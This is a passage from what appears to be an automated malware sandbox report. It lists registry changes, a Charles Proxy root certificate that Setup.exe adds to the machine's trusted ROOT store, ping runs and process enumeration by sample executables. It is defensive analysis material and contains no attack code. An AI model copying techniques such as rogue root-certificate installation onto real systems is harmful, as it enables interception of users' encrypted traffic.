"Russia TZ 11 Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM netsh.exe Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet netsh.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = d0097d6cf801d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{162FE4F7-B68F-46A5-9EC7-E8C01703763F} = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000f716108ddff5f4e3adb4304748632e3aef94d2cd004cfe44bc4262a1c20af1fd64aff42c50cd8ac5a24eff715537b013a03976dd4efe2f50924c42adf98c20c27048ffd588a1ebdeb8f0af0c9eef7529162f8d1f23bd3e5bbc2f43005e8437ae2d8251a13393dd11203c95e3a0ad98b9e31551f21aa9a104758b7e9a6410162d97fd6411fec11c98c9d0b4ec6890df298b8d2b0e22e2b9673400c456cb515825be59d3fac84dc0404a4e3f3b06b8634a0036f4ba6f882885762eb6b1b06759aed036628023564082ae54fd619e44d1ea9aaf5b1074bb6c7900b5b01f0d73d8033e35871cd4fb6f5b4384863f85562fc0c29a614b3a9b60871535e6f48493d9d637f454bd1e5e2401697cf136fc0dd5965b96002c78481ff1d24dfad8bbe85be97114b8eccf9d7064b6ddb2ce3389c1d8be42ab6e39e2b79e849fd5ce77933ffab8351c0d13dad07a4a48c4c479ea6e6218402e4606898097bfca88cc2fb2c70389f72ca3f933ef66ec5bf0a89b4f8aa4462f73f63f5da74bc76ee5e1d66616c5a4fabfaf4bcaab636ab86e0dd5da001ec9ae30706c7e63aae77fdd99afe024ea89e9af3ff5d9 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{EAE7D267-5452-4A56-A9A1-82205EB82BE5}" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 3488 PING.EXE 1340 PING.EXE 4396 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4084 1613214372547.exe 4084 1613214372547.exe 2132 1613214377312.exe 2132 1613214377312.exe 3820 1613214382562.exe 3820 1613214382562.exe 2192 23E04C4F32EF2158.tmp 2192 23E04C4F32EF2158.tmp 3128 seed.exe 3128 seed.exe 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found 2396 Process not Found -
Suspicious behavior: MapViewOfSection 4 IoCs
